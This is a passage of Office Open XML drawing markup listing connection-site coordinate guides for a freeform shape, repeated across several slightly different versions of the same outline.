              <a:gd name="connsiteX0" fmla="*/ 293 w 4108977"/>
              <a:gd name="connsiteY0" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 18363 w 4108977"/>
              <a:gd name="connsiteY1" fmla="*/ 7826418 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 1086 w 4108977"/>
              <a:gd name="connsiteY2" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 9082 w 4108977"/>
              <a:gd name="connsiteY3" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 11531 w 4108977"/>
              <a:gd name="connsiteY4" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 11531 w 4108977"/>
              <a:gd name="connsiteY5" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 8794 w 4108977"/>
              <a:gd name="connsiteY6" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 11531 w 4108977"/>
              <a:gd name="connsiteY7" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 7803 w 4108977"/>
              <a:gd name="connsiteY8" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 11531 w 4108977"/>
              <a:gd name="connsiteY9" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 2920 w 4108977"/>
              <a:gd name="connsiteY10" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 28163 w 4108977"/>
              <a:gd name="connsiteY11" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 49018 w 4108977"/>
              <a:gd name="connsiteY12" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4071260 w 4108977"/>
              <a:gd name="connsiteY13" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4104787 w 4108977"/>
              <a:gd name="connsiteY14" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4104786 w 4108977"/>
              <a:gd name="connsiteY15" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4071259 w 4108977"/>
              <a:gd name="connsiteY16" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4053752 w 4108977"/>
              <a:gd name="connsiteY17" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4053752 w 4108977"/>
              <a:gd name="connsiteY18" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 49004 w 4108977"/>
              <a:gd name="connsiteY19" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 11531 w 4108977"/>
              <a:gd name="connsiteY20" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 11531 w 4108977"/>
              <a:gd name="connsiteY21" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 987 w 4108977"/>
              <a:gd name="connsiteY22" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 11531 w 4108977"/>
              <a:gd name="connsiteY23" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 11531 w 4108977"/>
              <a:gd name="connsiteY24" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 11531 w 4108977"/>
              <a:gd name="connsiteY25" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX26" fmla="*/ 293 w 4108977"/>
              <a:gd name="connsiteY26" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 17376 w 4107990"/>
              <a:gd name="connsiteY1" fmla="*/ 7826418 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 99 w 4107990"/>
              <a:gd name="connsiteY2" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 8095 w 4107990"/>
              <a:gd name="connsiteY3" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY4" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY5" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 7807 w 4107990"/>
              <a:gd name="connsiteY6" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY7" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 6816 w 4107990"/>
              <a:gd name="connsiteY8" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY9" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 1933 w 4107990"/>
              <a:gd name="connsiteY10" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 27176 w 4107990"/>
              <a:gd name="connsiteY11" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 48031 w 4107990"/>
              <a:gd name="connsiteY12" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4070273 w 4107990"/>
              <a:gd name="connsiteY13" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4103800 w 4107990"/>
              <a:gd name="connsiteY14" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4103799 w 4107990"/>
              <a:gd name="connsiteY15" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4070272 w 4107990"/>
              <a:gd name="connsiteY16" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4052765 w 4107990"/>
              <a:gd name="connsiteY17" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4052765 w 4107990"/>
              <a:gd name="connsiteY18" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 48017 w 4107990"/>
              <a:gd name="connsiteY19" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY20" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY21" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 0 w 4107990"/>
              <a:gd name="connsiteY22" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY23" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY24" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX25" fmla="*/ 10544 w 4107990"/>
              <a:gd name="connsiteY25" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 17277 w 4107891"/>
              <a:gd name="connsiteY1" fmla="*/ 7826418 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 4107891"/>
              <a:gd name="connsiteY2" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 7996 w 4107891"/>
              <a:gd name="connsiteY3" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY4" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY5" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 7708 w 4107891"/>
              <a:gd name="connsiteY6" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY7" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 6717 w 4107891"/>
              <a:gd name="connsiteY8" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY9" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 1834 w 4107891"/>
              <a:gd name="connsiteY10" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 27077 w 4107891"/>
              <a:gd name="connsiteY11" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 47932 w 4107891"/>
              <a:gd name="connsiteY12" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4070174 w 4107891"/>
              <a:gd name="connsiteY13" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4103701 w 4107891"/>
              <a:gd name="connsiteY14" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4103700 w 4107891"/>
              <a:gd name="connsiteY15" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4070173 w 4107891"/>
              <a:gd name="connsiteY16" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4052666 w 4107891"/>
              <a:gd name="connsiteY17" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4052666 w 4107891"/>
              <a:gd name="connsiteY18" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 47918 w 4107891"/>
              <a:gd name="connsiteY19" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY20" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY21" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY22" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY23" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX24" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY24" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 17277 w 4107891"/>
              <a:gd name="connsiteY1" fmla="*/ 7826418 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 4107891"/>
              <a:gd name="connsiteY2" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 7996 w 4107891"/>
              <a:gd name="connsiteY3" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY4" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY5" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 7708 w 4107891"/>
              <a:gd name="connsiteY6" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY7" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 6717 w 4107891"/>
              <a:gd name="connsiteY8" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY9" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 1834 w 4107891"/>
              <a:gd name="connsiteY10" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 27077 w 4107891"/>
              <a:gd name="connsiteY11" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 47932 w 4107891"/>
              <a:gd name="connsiteY12" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4070174 w 4107891"/>
              <a:gd name="connsiteY13" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4103701 w 4107891"/>
              <a:gd name="connsiteY14" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4103700 w 4107891"/>
              <a:gd name="connsiteY15" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4070173 w 4107891"/>
              <a:gd name="connsiteY16" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4052666 w 4107891"/>
              <a:gd name="connsiteY17" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4052666 w 4107891"/>
              <a:gd name="connsiteY18" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 47918 w 4107891"/>
              <a:gd name="connsiteY19" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY20" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY21" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY22" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX23" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY23" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 17277 w 4107891"/>
              <a:gd name="connsiteY1" fmla="*/ 7826418 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 4107891"/>
              <a:gd name="connsiteY2" fmla="*/ 7712540 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 7996 w 4107891"/>
              <a:gd name="connsiteY3" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY4" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY5" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 7708 w 4107891"/>
              <a:gd name="connsiteY6" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY7" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 6717 w 4107891"/>
              <a:gd name="connsiteY8" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY9" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 1834 w 4107891"/>
              <a:gd name="connsiteY10" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 27077 w 4107891"/>
              <a:gd name="connsiteY11" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 47932 w 4107891"/>
              <a:gd name="connsiteY12" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4070174 w 4107891"/>
              <a:gd name="connsiteY13" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4103701 w 4107891"/>
              <a:gd name="connsiteY14" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4103700 w 4107891"/>
              <a:gd name="connsiteY15" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4070173 w 4107891"/>
              <a:gd name="connsiteY16" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4052666 w 4107891"/>
              <a:gd name="connsiteY17" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 4052666 w 4107891"/>
              <a:gd name="connsiteY18" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 47918 w 4107891"/>
              <a:gd name="connsiteY19" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY20" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY21" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX22" fmla="*/ 10445 w 4107891"/>
              <a:gd name="connsiteY22" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 15906 w 4106520"/>
              <a:gd name="connsiteY1" fmla="*/ 7826418 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 6625 w 4106520"/>
              <a:gd name="connsiteY2" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY3" fmla="*/ 7648210 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY4" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 6337 w 4106520"/>
              <a:gd name="connsiteY5" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY6" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 5346 w 4106520"/>
              <a:gd name="connsiteY7" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY8" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 463 w 4106520"/>
              <a:gd name="connsiteY9" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 25706 w 4106520"/>
              <a:gd name="connsiteY10" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 46561 w 4106520"/>
              <a:gd name="connsiteY11" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 4068803 w 4106520"/>
              <a:gd name="connsiteY12" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4102330 w 4106520"/>
              <a:gd name="connsiteY13" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4102329 w 4106520"/>
              <a:gd name="connsiteY14" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4068802 w 4106520"/>
              <a:gd name="connsiteY15" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY16" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY17" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 46547 w 4106520"/>
              <a:gd name="connsiteY18" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY19" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY20" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX21" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY21" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 15906 w 4106520"/>
              <a:gd name="connsiteY1" fmla="*/ 7826418 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 6625 w 4106520"/>
              <a:gd name="connsiteY2" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY3" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 6337 w 4106520"/>
              <a:gd name="connsiteY4" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY5" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 5346 w 4106520"/>
              <a:gd name="connsiteY6" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY7" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 463 w 4106520"/>
              <a:gd name="connsiteY8" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 25706 w 4106520"/>
              <a:gd name="connsiteY9" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 46561 w 4106520"/>
              <a:gd name="connsiteY10" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 4068803 w 4106520"/>
              <a:gd name="connsiteY11" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 4102330 w 4106520"/>
              <a:gd name="connsiteY12" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4102329 w 4106520"/>
              <a:gd name="connsiteY13" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4068802 w 4106520"/>
              <a:gd name="connsiteY14" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY15" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY16" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 46547 w 4106520"/>
              <a:gd name="connsiteY17" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY18" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY19" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX20" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY20" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 6625 w 4106520"/>
              <a:gd name="connsiteY1" fmla="*/ 7658609 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY2" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 6337 w 4106520"/>
              <a:gd name="connsiteY3" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY4" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 5346 w 4106520"/>
              <a:gd name="connsiteY5" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY6" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 463 w 4106520"/>
              <a:gd name="connsiteY7" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 25706 w 4106520"/>
              <a:gd name="connsiteY8" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 46561 w 4106520"/>
              <a:gd name="connsiteY9" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 4068803 w 4106520"/>
              <a:gd name="connsiteY10" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 4102330 w 4106520"/>
              <a:gd name="connsiteY11" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 4102329 w 4106520"/>
              <a:gd name="connsiteY12" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4068802 w 4106520"/>
              <a:gd name="connsiteY13" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY14" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY15" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 46547 w 4106520"/>
              <a:gd name="connsiteY16" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY17" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY18" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX19" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY19" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY1" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 6337 w 4106520"/>
              <a:gd name="connsiteY2" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY3" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 5346 w 4106520"/>
              <a:gd name="connsiteY4" fmla="*/ 7168704 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY5" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 463 w 4106520"/>
              <a:gd name="connsiteY6" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 25706 w 4106520"/>
              <a:gd name="connsiteY7" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 46561 w 4106520"/>
              <a:gd name="connsiteY8" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 4068803 w 4106520"/>
              <a:gd name="connsiteY9" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 4102330 w 4106520"/>
              <a:gd name="connsiteY10" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 4102329 w 4106520"/>
              <a:gd name="connsiteY11" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 4068802 w 4106520"/>
              <a:gd name="connsiteY12" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY13" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY14" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 46547 w 4106520"/>
              <a:gd name="connsiteY15" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY16" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY17" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX18" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY18" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY1" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 6337 w 4106520"/>
              <a:gd name="connsiteY2" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY3" fmla="*/ 7181458 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 9074 w 4106520"/>
